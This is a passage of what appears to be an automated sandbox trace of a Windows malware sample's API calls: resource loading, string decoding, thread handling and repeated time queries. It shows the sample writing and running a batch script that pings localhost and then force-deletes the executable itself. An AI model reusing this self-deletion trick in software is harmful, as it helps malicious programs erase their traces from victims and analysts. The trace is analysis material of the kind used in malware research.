\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" 
\"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x13e0df0, dwCreationFlags=0x4, lpThreadId=0x13fdd84 | out: lpThreadId=0x13fdd84*=0xcd4) returned 0xb8 [0108.875] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0108.875] ResumeThread (hThread=0xb8) returned 0x1 [0108.875] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0109.041] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x30 [0109.041] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0109.041] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0109.041] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0109.041] LockResource (hResData=0x5187d4) returned 0x5187d4 [0109.041] FreeResource (hResData=0x5187d4) returned 0 [0109.041] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0109.041] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0109.041] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0109.041] LockResource (hResData=0x50d64c) returned 0x50d64c [0109.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1405120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0109.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1405120, cbMultiByte=38, lpWideCharStr=0x13fdf6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0109.041] FreeResource (hResData=0x50d64c) returned 0 [0109.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, 
lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1405124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0109.041] GetCurrentThreadId () returned 0xcc4 [0109.041] GetCurrentThreadId () returned 0xcc4 [0109.041] GetCurrentThreadId () returned 0xcc4 [0109.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13fde48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0109.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13fde48, cbMultiByte=83, lpWideCharStr=0x139012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0109.042] GetTickCount () returned 0x2618f [0109.042] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=16583076492) returned 1 [0109.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="G畔﮴\x12\x1c翻") returned 1 [0109.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="y畔﮴\x12\x1c翻") returned 1 [0109.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="2畔﮴\x12\x1c翻") returned 1 [0109.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="d畔﮴\x12\x1c翻") returned 1 [0109.042] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="w畔﮴\x12\x1c翻") returned 1 [0109.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="m畔﮴\x12\x1c翻") returned 1 [0109.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="V畔﮴\x12\x1c翻") returned 1 [0109.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="F畔﮴\x12\x1c翻") returned 1 [0109.042] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0109.042] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0109.042] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", lpszShortPath=0x139c65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe") returned 0x30 [0109.042] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0109.042] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0109.042] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\gy2dwmvf.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0109.043] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0109.043] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0109.043] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x137fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0109.043] WriteFile (in: hFile=0xe8, lpBuffer=0x137fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x137fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0109.044] CloseHandle (hObject=0xe8) returned 1 [0109.046] GetCurrentThreadId () returned 0xcc4 [0109.046] GetCurrentThreadId () returned 0xcc4 [0109.046] GetCurrentThreadId () returned 0xcc4 [0109.046] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, 
lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xcec, dwThreadId=0xcf0)) returned 1 [0109.049] CloseHandle (hObject=0xec) returned 1 [0109.049] CloseHandle (hObject=0xe8) returned 1 [0109.049] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0109.049] GetCurrentThreadId () returned 0xcc4 [0109.049] GetCurrentThreadId () returned 0xcc4 [0109.049] GetCurrentThreadId () returned 0xcc4 [0109.049] GetCurrentThreadId () returned 0xcc4 [0109.049] GetCurrentThreadId () returned 0xcc4 [0109.049] GetCurrentThreadId () returned 0xcc4 [0109.049] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 
0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] GetCurrentThreadId () returned 0xcc4 [0109.050] WSACleanup () returned 0 [0109.217] FreeLibrary (hLibModule=0x77380000) returned 1 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentProcess () returned 0xffffffff [0109.217] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0109.217] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] ResetEvent (hEvent=0x88) returned 1 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] ResetEvent (hEvent=0x88) returned 1 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] CloseHandle (hObject=0x88) returned 1 
[0109.217] CloseHandle (hObject=0x8c) returned 1 [0109.217] CloseHandle (hObject=0x84) returned 1 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetCurrentThreadId () returned 0xcc4 [0109.217] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.217] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.217] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.217] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.217] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.217] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) 
[0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: 
lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, 
wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, 
wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.218] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, 